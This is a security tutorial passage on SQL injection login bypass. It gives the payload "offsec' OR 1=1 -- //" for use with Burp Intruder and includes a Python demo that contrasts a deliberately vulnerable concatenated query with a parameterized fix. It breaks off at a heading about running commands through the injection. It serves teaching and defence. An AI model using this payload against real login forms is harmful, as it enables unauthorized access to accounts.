Authentication Bypass
When a login form is present, an authentication bypass can occur if user input is not properly sanitized before it is used in the query. If no lockout policy is enforced for login attempts, you can use the payload below with the Burp Suite Intruder tool to test its effectiveness.
One example:

```sql
offsec' OR 1=1 -- //
```

By forcing the closing quote on the username value and adding the statement `OR 1=1`, followed by a comment separator (two consecutive dashes followed by at least one whitespace character), we prematurely terminate the SQL statement. The two forward slashes (//) serve as additional protection for the payload against any whitespace truncation the web application might apply.
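The following is an added example (not from the original page) that shows why the payload above works and how the same login check looks when it is fixed. It uses an in-memory SQLite database with a constructed `users` table; the `login_vulnerable` function builds the query by string concatenation the way a broken login form would, while `login_parameterized` passes the same input as bound parameters. Table name, column names and sample credentials are assumptions for the demonstration.

```python
import sqlite3


def make_db():
    """Create a constructed in-memory users table (sample data, not real)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.execute(
        "INSERT INTO users (username, password) VALUES ('offsec', 'correct-horse')"
    )
    conn.commit()
    return conn


def build_vulnerable_query(username, password):
    """Concatenate user input straight into the SQL text (the defect)."""
    return (
        "SELECT id, username FROM users WHERE username = '"
        + username
        + "' AND password = '"
        + password
        + "'"
    )


def login_vulnerable(conn, username, password):
    """Login check that trusts the concatenated query: input can alter the SQL."""
    sql = build_vulnerable_query(username, password)
    # With the payload, the closing quote ends the username literal, OR 1=1
    # makes the WHERE clause always true, and '--' comments out the password
    # check, so the first user row is returned and the login succeeds.
    return conn.execute(sql).fetchone() is not None


def login_parameterized(conn, username, password):
    """Hardened check: placeholders send the input as data, never as SQL syntax."""
    sql = "SELECT id, username FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def compare(conn, username, password):
    """Return both outcomes for the same input so they can be compared side by side."""
    return {
        "query_text": build_vulnerable_query(username, password),
        "vulnerable": login_vulnerable(conn, username, password),
        "parameterized": login_parameterized(conn, username, password),
    }


if __name__ == "__main__":
    db = make_db()
    payload = "offsec' OR 1=1 -- //"  # the payload discussed in the text
    for user, pw in [("offsec", "correct-horse"), (payload, "wrong")]:
        result = compare(db, user, pw)
        print(result["query_text"])
        print("  vulnerable login:    ", result["vulnerable"])
        print("  parameterized login: ", result["parameterized"])
```

Running it shows the concatenated query accepting the payload with a wrong password while the parameterized query rejects it, and both still accepting the real credentials. Note that SQLite treats `--` as a comment even without a following space; the trailing whitespace requirement described above applies to MySQL, and the payload as written satisfies both.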
Running command
If SQL injection is present, we can enumerate the database by running commands through the injection point.
Below are some examples: